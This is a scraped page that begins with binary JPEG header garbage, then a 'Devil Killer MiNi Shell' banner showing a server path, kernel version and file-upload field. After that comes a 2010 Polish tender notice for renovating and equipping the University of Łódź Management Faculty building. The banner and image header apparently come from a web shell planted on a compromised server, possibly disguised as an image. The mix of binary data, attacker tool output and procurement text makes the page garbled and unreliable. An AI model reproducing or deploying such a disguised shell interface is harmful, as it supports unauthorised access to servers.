JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100903/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100903/277740-N-2010.html

<p class="kh_header"><b>Łódź: Modernizacja, przeprowadzenie prac budowlano - instalacyjnych oraz doposażenie w budynku Wydziału Zarządzania Uniwersytetu Łódzkiego przy. Ul. Matejki 22/26</b><br>
<b>Numer ogłoszenia: 277740 - 2010; data zamieszczenia: 03.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Łódzki , ul. Narutowicza 65, 90-131 Łódź, woj. łódzkie, tel. 0-42 635 43 54, faks 0-42 635 43 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uni.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja, przeprowadzenie prac budowlano - instalacyjnych oraz doposażenie w budynku Wydziału Zarządzania Uniwersytetu Łódzkiego przy. Ul. Matejki 22/26.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie następujących prac budowlano - instalacyjnych w budynku Wydziału Zarządzania Uniwersytetu Łódzkiego.
Prace branży budowlanej
1.	Wykonanie sufitów podwieszonych w salach dydaktycznych nr 102; 103; 116; 202; 203; 216; 302; 303; 317
2.	Malowanie ścian w salach dydaktycznych wraz z filarami
Sale dydaktyczne nr 	101; 102; 103; 104; 109; 116; 		- I p
201; 202; 203; 204; 210; 216; 		- II p
301; 302; 303; 304; 310; 317;		- III p
3.	Montaż desek odbojowych w salach dydaktycznych ( kolor okleiny- buk)
4.	Wymiana wykładziny dywanowej na nową w pomieszczeniach Dziekanatu nr 10; 11; 12:
Parametry wykładziny:
- wykładzina pętelkowa w rulonie wykonana z włókna poliamidowego
- wysokość całkowita 6,0 mm, wysokość runa min. 2,4 mm ciężar całkowity 4450 g-m2
-klasyfikacja użytkowa 33
-antyelektrostatyczność mniejsza 2,0 kV
-izolacyjność akustyczna 23 dB
- produkt trudno zapalny o klasyfikacji ogniowej Bfl-s1
5.	Wymiana wykładziny podłogowej na nową dywanową , antyelektrostatyczną w pracowni komputerowej nr 3
Parametry wykładziny:
- wykładzina igłowana w rulonie wykonana z włókien poliamidowych (wykładzina typu filc)
- grubość całkowita 6,5 mm
- ciężar całkowity 1450 g-m2
- klasyfikacja użytkowa 33
- antyelektrostatyczność mniejsza 2,0kV
- rezystancja pionowa mniejsza 1 x 108 Ohm
- odporność ogniowa klasa Bfl - S1
- tłumienie dźwięków około 22 dB
6.	Wykonanie  konstrukcji wsporczej umieszczonej w ściance działowej z płyt kartonowo - gipsowych służącej do zawieszenia telewizora 60 cali w salach: 101;104; 201; 204; 210; 301; 304; 310
7.	Wyposażenie sal w stanowisko dla dydaktyka sale nr:
102; 103; 116; 202; 203; 216; 302; 303; 317
- Biurko 160x 70x 75 z półką na klawiaturę oraz zasłoną zasłaniającego nogi od frontu o wys. 40cm. - rys. zał. nr 1
- Szafka pod biurko na komputer  z jedną półką o wymiarach 60 x 65x 70 - rys. zał. nr 1 
Materiał na biurka i szafki:
- płyta wiórowa  melaminowana dwustronnie
- kolor płyty buk
- grubość blatów i konstrukcji biurek, grubość wieńców górnych i dolnych szafek - 25 mm
- grubość korpusów i półek oraz półek na klawiaturę w biurkach - 18 mm
- prowadnice półek na klawiaturę stalowe, rolkowe z blokadą malowane proszkowo
- wszystkie obrzeża ABS o gr. 2 mm w kolorze użytej płyty meblowej
- zamki: zamek łamany typu YALE
-zawiasy: stalowe, puszkowe
-plecy szafek : HDF o gr. minimum 3 mm
- stopki meblowe: biurko - ślizgacze PCV, szafki - kula z regulacją w wieńcu dolnym
-uchwyty: metalowe, kolor satyna, malowane proszkowo
- regulacja półek - 3 położenia
- przepusty na kable w blacie biurka - 1 szt., w ściankach szafki - 4szt.
8.	 Wyposażenie laboratorium komputerowego nr 3 w stoliki komputerowe o wymiarach blatu 95 x 60.
Szuflada na klawiaturę z myszką szer. 65 cm z ogranicznikiem wysuwania o grubości 18 mm., dwa przepusty kablowe, korytka na kable podwieszane pod blatem
Blat płyta laminowana gr. 25 mm, obrzeże ABS grub. 2 mm 
Stelaż metalowy spawany, profil 30 x 30 mm, stojak metalowy w kształcie  litery T wyposażony w stopki regulacyjne, malowanie farbami proszkowymi, kolor satyna
9.	 Naprawa drewnianych elementów balustrad
- dorobienie nowych elementów drewnianych tralek balustrad i zamocowanie ich na wcisk w element stalowy oraz dodatkowo wkrętami zabezpieczającymi przed wypadnięciem.
10. 	Roboty remontowe w pomieszczeniu parteru przy wejściu do budynku - likwidacja przecieku przez ściany, wykonanie robót naprawczych budowlanych mające na celu wyeliminowanie zawilgocenia ściany zew. W pomieszczeniach na parterze z lewej strony od wejścia przy mostku zał. nr 2a Arkusz kalkulacyjny

Instalacje elektryczne i niskoprądowe:

1.	Demontaż w 9 salach opraw oświetleniowych nastropowych 2x36 W (po 9 opraw w każdej sali). Numery sal : 102, 103, 116, 202, 203, 216, 302, 303, 317.
2.	Zainstalowanie w sufitach podwieszanych i podłączenie do istniejących wypustów opraw oświetleniowych 4x18 W rastrowych z pełną parabolą w 9 salach jw. Po 12 opraw w każdej sali.
3.	Zainstalowanie w sufitach podwieszanych i wykonanie instalacji dla opraw oświetleniowych żarowych 1x75 W włączanych w czasie projekcji w 9 salach  jw. wyposażonych w ekrany. Po 9 opraw w każdej Sali.
4.	Wykonanie instalacji i zamontowanie w 9 salach jw. : ekranów (150x200 cm) rozwijanych elektrycznie ze sterowaniem z przełącznika, projektorów multimedialnych z konstrukcją do podwieszenia do sufitu, komputerów, wzmacniaczy, głośników (po 4 szt na salę), przełączników wizyjnych, mikrofonów. Wzmacniacz, komputer i przełącznik wizyjny w szafce przy stanowisku prowadzącego. Do projektorów doprowadzić po 1 skrętce komputerowej kat 5e z najbliższego LPD, zasilanie 230V, kable:  RGB, S-video, foniczny.
5.	Wykonanie instalacji i zamontowanie w 8 salach telewizorów LCD 60 cali wraz z konstrukcją mocowaną do ściany. Do telewizorów doprowadzić po 1 skrętce komputerowej kat 5e z najbliższego LPD, zasilanie 230V, kable:  HDMI, SVGA, S-video, foniczny. Numery sal: 101, 104, 201, 204, 210, 301, 304, 310.
6.	Wykonanie w 8 salach komputerowych instalacji audiowizualnych dla projektorów multimedialnych. Do projektorów doprowadzić po 1 skrętce komputerowej kat 5e z najbliższego LPD, zasilanie 230V, kable:  RGB, S-video, foniczny. Numery sal: 01, 02, 05, 06, 07, 08, 1, 2.
7.	Wymiana oprzewodowania niskoprądowego w 3 salach dydaktycznych. Nr sal: 106, 306, 307.
Zainstalowanie w auli głównej dwóch  puszek podłogowych z podziałem na instalacje 230V i instalacje niskoprądowe zamiast istniejącej jednej

Urządzenia AV dla Wydziału Zarządzania zał. nr 2c


Opis do instalacji dla urządzeń audiowizualnych


Sale z projektorami i ekranami (102,103,109,116,202,203,216,302,303,317).

1.	Zasilanie do szafek sprzętowych przy stanowisku wykładowcy prowadzić z najbliższej rozdzielnicy jako wydzielony obwód (oddzielnie dla każdej sali), zabezpieczony wyłącznikiem P312 B16 30mA. W szafce obwód zakończyć gniazdem przenośnym wielokrotnym 6x2P+Z.
2.	Do szafek sprzętowych doprowadzić z najbliższego punktu dystrybucyjnego po dwie skrętki komputerowe UTP 4x2x0,5 kat 5e. W szafkach zakończyć gniazdami RJ 45 kat 5e, a w punktach dystrybucyjnych rozszyć na patchpanelach.
3.	Zasilanie ekranów wyprowadzić z istniejącego obwodu gniazd ogólnych. Sterowanie ekranem z przełącznika na ścianie w pobliżu okna.
4.	Z szafki sprzętowej wyprowadzić wiązkę przewodów do projektora, długość wiązki do 15 m. Wiązka będzie zawierała:
a.	przewód zasilający OMY 3x1,5 mm2 zakończony gniazdem 2P+Z przy projektorze i wtyczką sieciową w szafce,
b.	przewód RGBHV o parametrach transmisyjnych nie gorszych niż Percon VK520 zakończony gniazdem DB15HD w szafce i wtykiem DB15HD przy projektorze,
c.	przewód CV zakończony gniazdem RCA w szafce i wtykiem RCA przy projektorze,  o parametrach nie gorszych niż Kramer BC1X59,
d.	przewód HDMI zakończony wtykami o parametrach nie gorszych niż Kramer C-HDMI/HDMI 50 HDCP compiliant,
e.	Przewód dla zasilania głośników (głośniki i wzmacniacz w drugim etapie) OMY 2x1 z szafki w przestrzeń nad sufitem podwieszanym w rejonie projektora.
5.	Do projektora doprowadzić jedną skrętkę UTP 4x2x0,5 kat 5e z najbliższego punktu dystrybucyjnego. Przy projektorze skrętkę zakończyć wtykiem RJ45, a w punkcie dystrybucyjnym rozszyć na patchpanelu.
6.	Uchwyt sufitowy projektora.
Zaczep uchwytu dostosowany do oferowanego projektora, ( przegub umożliwiający precyzyjną regulację położenia projektora w poziomie i w pionie). Regulowana długość w zakresie  50 - 100 cm, gwarantowana przez producenta obciążalność nie mniej niż 20kg. Możliwość zamontowania osłony na przewody. 

Sale z telewizorami 60 cali (101,104,201,204,210,301,304,310), zał. nr 3

1.	Zasilanie do telewizorów plazmowych wykonać z istniejących w salach obwodów zasilania komputerów, gniazdo p/t 2P+Z umieścić w rejonie telewizora.
2.	Do każdego telewizora doprowadzić jedną skrętkę UTP 4x2x0,5 kat 5e z najbliższego punktu dystrybucyjnego. Przy telewizorze skrętkę zakończyć gniazdem RJ45, a w punkcie dystrybucyjnym rozszyć na patchpanelu.
3.	Na ścianie w rejonie stanowiska dla prowadzącego przy oknie zainstalować puszkę z przyłączami dla TV plazmowego. Z puszki tej wyprowadzić do telewizora wiązkę przewodów zawierającą (długość wiązki do 10 m):
a.	przewód RGBHV o parametrach transmisyjnych nie gorszych niż Percon VK520 zakończony gniazdem DB15HD w puszce i wtykiem DB15HD przy TV plazmowym
b.	przewód CV zakończony gniazdem RCA w puszce i wtykiem RCA przy TV plazmowym, o parametrach transmisyjnych nie gorszych niż Kramer BC1X59,
c.	przewód HDMI zakończony wtykami o parametrach nie gorszych niż Kramer C-HDMI/HDMI 50 HDCP compiliant
d.	3 przewody foniczne zakończone w puszce gniazdami RCA, przy TV plazmowym wtykami RCA.
4.	Telewizory zamontowane na ścianie po prawej stronie tablic, górna krawędź telewizora na równi z górną krawędzią tablic. Odbiorniki umieszczone skośnie względem ściany z odsunięciem od jej płaszczyzny lewego boku o ok.10 cm i prawego o ok. 60 cm. Uchwyt ścienny do TV plazmowego umożliwiający regulację w dwóch płaszczyznach. Nośność uchwytu gwarantowana przez producenta 100 kg.

Tory kablowe w salach komputerowych (01,02,05,06,07,08,1,2)
1.	Ze stanowiska prowadzącego wyprowadzić wiązkę przewodów do projektora, długość     wiązki do 15 m. Wiązka będzie zawierała:
a.	przewód zasilający OMY 3x1,5 mm2 zakończony gniazdem 2P+Z przy projektorze i wtyczką sieciową w szafce,
b.	przewód RGBHV o parametrach transmisyjnych nie gorszych niż Percon VK520 zakończony gniazdem DB15HD w szafce i wtykiem DB15HD przy projektorze,
c.	przewód CV zakończony gniazdem RCA w szafce i wtykiem RCA przy projektorze,  o parametrach nie gorszych niż Kramer BC1X59,
d.	Przewód dla zasilania głośników (głośniki i wzmacniacz w drugim etapie) OMY 2x1 z szafki w przestrzeń nad sufitem podwieszanym w rejonie projektora.
2.	Do projektora doprowadzić jedną skrętkę UTP 4x2x0,5 kat 5e z najbliższego punktu dystrybucyjnego. Przy projektorze skrętkę zakończyć wtykiem RJ45, a w punkcie dystrybucyjnym rozszyć na patchpanelu.
Wymiana przewodów wizyjnych w trzech salach dydaktycznych (106,306,307)
 Ze stanowiska prowadzącego do projektora należy ułożyć przewód RGBHV o parametrach transmisyjnych nie gorszych niż Percon VK520 zakończony gniazdem DB15HD w szafce i wtykiem DB15HD przy projektorze.
  Opis sposobu przedstawiania ofert wariantowych oraz minimalne warunki, jakim muszą odpowiadać oferty wariantowe, jeżeli zamawiający dopuszcza ich składanie.
Zamawiający nie przewiduje możliwości składania ofert wariantowych w niniejszym postępowaniu. 
Zamawiający dopuszcza składanie ofert równoważnych. 
Ofertą równoważną jest przedmiot o takich samych lub lepszych parametrach technicznych, jakościowych, funkcjonalnych spełniający minimalne parametry określone przez Zamawiającego w dokumentacji technicznej. W takim przypadku Wykonawca zobowiązany jest przedstawić wraz z ofertą szczegółową specyfikację, z których w sposób nie budzący wątpliwości Zamawiającego winno wynikać, iż zaoferowany asortyment jest o takich samych lub lepszych parametrach technicznych, jakościowych, funkcjonalnych w odniesieniu do asortymentu określonego przez Zamawiającego w opisie przedmiotu zamówienia. Zamawiający informuje, iż w razie gdy w opisie przedmiotu zamówienia znajdują się znaki towarowe, za ofertę równoważną uznaje się ofertę spełniającą parametry indywidualnie wskazanego asortymentu określone przez jego producenta.
Zamawiający dopuszcza możliwość powierzenia realizacji zamówienia podwykonawcom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.44.00-4, 39.10.00.00-3, 38.65.20.00-1, 30.23.13.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca przystępujący do niniejszego postępowania musi wnieść wadium przetargowe w wysokości 
10.327,86 zł (słownie zł: dziesięć trzysta dwadzieścia siedem,86/100
Wpłacona przez Wykonawcę kwota wadium powinna również uwzględniać ewentualne koszty związane z prowizją bankową za przelew kwoty wadium na konto wskazane przez Zamawiającego.
Wadium należy wnieść najpóźniej do dnia ostatecznego terminu składania ofert. 
Wadium może być wnoszone w jednej lub kilku następujących formach: 
- pieniądzu;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).

Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania  ofertą zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust.5 ustawy.
Wadium wnoszone w formach innych niż w pieniądzu, winno być złożone w formie oryginału w siedzibie zamawiającego (oddzielnie od oferty) - Biuro Inwestycji i Nieruchomości UŁ, ul. Lindleya 3, 90-131 Łódź, pok.226 w godz. 7.30 - 15.30.

Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego.
Nr konta Uniwersytetu Łódzkiego: 
Bank Polska Kasa Opieki S.A. II Oddział w Łodzi, ul. Piotrkowska 270, 
nr 86 1240 3028 1111 0000 2822 2488.
Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Zgodnie z art.46 ust.3 ustawy - prawo zamówień publicznych, zamawiający w wyznaczonym terminie będzie żądał ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art.46 ust. 1 ustawy, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie ,o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

UWAGA:
1.	Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, tj. do dnia 17.09.2010 r. , do godz. 9:30
2.	Wadium wniesione w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
3.	Wykonawca, który nie zabezpieczy oferty akceptowalną formą wadium na wymagany okres związania ofertą według zasad określonych w specyfikacji, zostanie wykluczony z postępowania, a jego oferta uznana za odrzuconą.
4.	W przypadku przedłużenia okresu związania ofertą, wykonawca musi jednocześnie przedłużyć okres ważności wadium albo jeżeli nie jest to możliwe wnieść nowe wadium na przedłużony okres związania ofertą.
5.	W pozostałych przypadkach mają zastosowanie przepisy dotyczące wadium wynikające z ustawy Prawo Zamówień Publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada w wykazie robót budowlanych, w zakresie niezbędnym do wykazania wiedzy i doświadczenia, wykonane w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 2 roboty budowlane o wartości minimum180 tys. zł netto każda wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Pod pojęciem załączenie dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone należy rozumieć każdy dokument, z którego będzie wynikał ten fakt, tj. np. kopie protokołów odbioru i ewentualne decyzje o przekazaniu budynków w użytkowanie jak i listy referencyjne czy opinie inwestorów potwierdzające, że prace wykonane zostały z należytą starannością.
UWAGA: w przypadku wykonawców, którzy realizowali roboty budowlane w innych walutach niż PLN, Zamawiający przeliczy wartość netto tych robót po średnim kursie NBP z dnia ukazania się ogłoszenia o zamówieniu..</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże w opłaconej polisie, a w przypadku jej braku w innym dokumencie potwierdzającym, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę 300 tys. zł.
UWAGA: w przypadku wykonawców, którzy przedstawią polisę ubezpieczeniową lub inny dokument potwierdzający ubezpieczenie od odpowiedzialności cywilnej  w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w innej walucie niż PLN, Zamawiający przeliczy ich wartość po średnim kursie NBP z dnia ukazania się ogłoszenia o zamówieniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
